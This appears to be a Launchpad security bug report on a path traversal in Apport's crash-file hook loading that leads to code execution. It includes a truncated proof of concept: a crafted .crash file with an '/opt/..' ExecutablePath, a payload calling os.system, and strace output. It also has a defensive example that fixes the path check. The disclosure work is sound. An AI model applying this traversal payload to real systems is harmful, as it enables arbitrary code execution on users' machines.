Code execution through path traversal in .crash files processing
| Affects | Status | Importance | Assigned to | Milestone |
|---|---|---|---|---|
| Apport | Fix Released | High | Unassigned | |
| apport (Ubuntu) | Fix Released | High | Brian Murray | |
| Trusty | Fix Released | High | Unassigned | |
| Xenial | Fix Released | High | Unassigned | |
| Yakkety | Fix Released | High | Unassigned | |
| Zesty | Fix Released | High | Unassigned | |
| Artful | Fix Released | High | Brian Murray | |
Bug Description
The function add_hooks_info in apport/report.py is vulnerable to a directory traversal when processing the ExecutablePath key of a malicious .crash file:
```python
opt_path = None
if self.get(
elif package:
    # check package contents
    try:
        for f in apport.
    except ValueError:
        # uninstalled package
if opt_path:
    while len(opt_path) >= len(_opt_dir):
```
This can be used to execute an arbitrary python script from an attacker controlled path when a crash file is opened:
```
fwilhelm@box:~$ cat poc.crash
ProblemType: Bug
ExecutablePath: /opt/..
Package: f
fwilhelm@box:~$ cat /tmp/poc/
import os
os.system(
fwilhelm@bpx:~$ strace -eprocess -f /usr/share/
[pid 62617] execve("/bin/sh", ["sh", "-c", "gnome-
[pid 62617] execve(
```
The subdirectory requirement makes this a bit tricky to exploit remotely, but depending on the environment a malicious USB drive, a shared NFS share or a crash file inside an archive could be used.
Please credit Felix Wilhelm from the Google Security Team in all releases, patches and advisories related to these issues.
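As an added illustration (not apport's code and not part of the report above), the following Python contrasts the string-prefix test visible in the quoted snippet with a containment check that canonicalizes the path before trusting it. The function names, the `HOOK_SUFFIX` layout and the sample paths are assumptions made for this example; it uses `posixpath` only, so it runs anywhere without touching the filesystem.

```python
"""Prefix check versus containment check for an executable path under /opt.

Added example; this is not apport's code. HOOK_SUFFIX, the function names and
the sample paths are assumptions made for the illustration.
"""
import posixpath

OPT_DIR = "/opt"
# Assumed hook-directory layout below each candidate directory.
HOOK_SUFFIX = ("share", "apport", "package-hooks")


def _walk_up(path, opt_dir):
    """Collect one candidate hook directory per ancestor of `path`, walking
    towards `opt_dir`; mirrors the loop condition visible in the report."""
    dirs = []
    while len(path) >= len(opt_dir):
        dirs.append(posixpath.join(path, *HOOK_SUFFIX))
        parent = posixpath.dirname(path)
        if parent == path:  # reached '/', nothing further to strip
            break
        path = parent
    return dirs


def naive_hook_dirs(executable_path, opt_dir=OPT_DIR):
    """Vulnerable shape: a plain string-prefix test on the untrusted value.
    '/opt/../tmp/poc' passes, so the first candidate lies under /tmp."""
    if not executable_path.startswith(opt_dir):
        return []
    return _walk_up(executable_path, opt_dir)


def safe_hook_dirs(executable_path, opt_dir=OPT_DIR):
    """Hardened shape: canonicalize, then test containment component-wise.

    posixpath.normpath collapses '..' and duplicate separators lexically, which
    keeps this example offline; on a real system follow it with
    os.path.realpath so a symlink under /opt cannot redirect the walk either.
    """
    if not posixpath.isabs(executable_path):
        return []
    resolved = posixpath.normpath(executable_path)
    # commonpath compares whole components, so it rejects '/opt/../tmp/poc'
    # (resolves to /tmp/poc) and also '/optional/x', which startswith accepts.
    if resolved == opt_dir or posixpath.commonpath([opt_dir, resolved]) != opt_dir:
        return []
    return _walk_up(resolved, opt_dir)


def escapes_opt(dirs, opt_dir=OPT_DIR):
    """True if any candidate directory resolves to a location outside opt_dir."""
    return any(
        posixpath.commonpath([opt_dir, posixpath.normpath(d)]) != opt_dir
        for d in dirs
    )


if __name__ == "__main__":
    # Constructed sample values: the traversal shape from the report, a prefix
    # collision, and a legitimate /opt install.
    for sample in ("/opt/../tmp/poc", "/optional/x", "/opt/foo/bin/app"):
        naive = naive_hook_dirs(sample)
        safe = safe_hook_dirs(sample)
        print(f"{sample}: naive escapes /opt = {escapes_opt(naive)}, "
              f"hardened accepts = {bool(safe)}")
```

The point the contrast makes: `startswith` answers a question about the string, not about the directory, so both `..` segments and sibling names such as `/optional` slip through; normalizing first and then comparing path components with `commonpath` answers the question that actually matters, namely whether every directory the hook loader will consult still lies under `/opt`.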
CVE References
| Changed in apport (Ubuntu Trusty): | |
| status: | New → Confirmed |
| Changed in apport (Ubuntu Xenial): | |
| status: | New → Confirmed |
| Changed in apport (Ubuntu Yakkety): | |
| status: | New → Confirmed |
| Changed in apport (Ubuntu Zesty): | |
| status: | New → Confirmed |
| Changed in apport (Ubuntu Artful): | |
| status: | New → Confirmed |
| Changed in apport (Ubuntu Trusty): | |
| importance: | Undecided → High |
| Changed in apport (Ubuntu Xenial): | |
| importance: | Undecided → High |
| Changed in apport (Ubuntu Yakkety): | |
| importance: | Undecided → High |
| Changed in apport (Ubuntu Zesty): | |
| importance: | Undecided → High |
| Changed in apport (Ubuntu Artful): | |
| importance: | Undecided → High |
| Changed in apport: | |
| status: | Confirmed → Fix Released |
| importance: | Undecided → High |
| information type: | Private Security → Public Security |
| tags: | added: patch |
| Changed in apport (Ubuntu Artful): | |
| status: | Confirmed → In Progress |
| assignee: | nobody → Brian Murray (brian-murray) |

Hi Felix - thanks for the report! I don't immediately see how an attacker could have control of what Apport uses for ExecutablePath in the crash file. Is there more to your attack than hand crafting a .crash file and running apport-gtk on it or am I missing something here?
Subscribing bdmurray for Ubuntu apport expertise.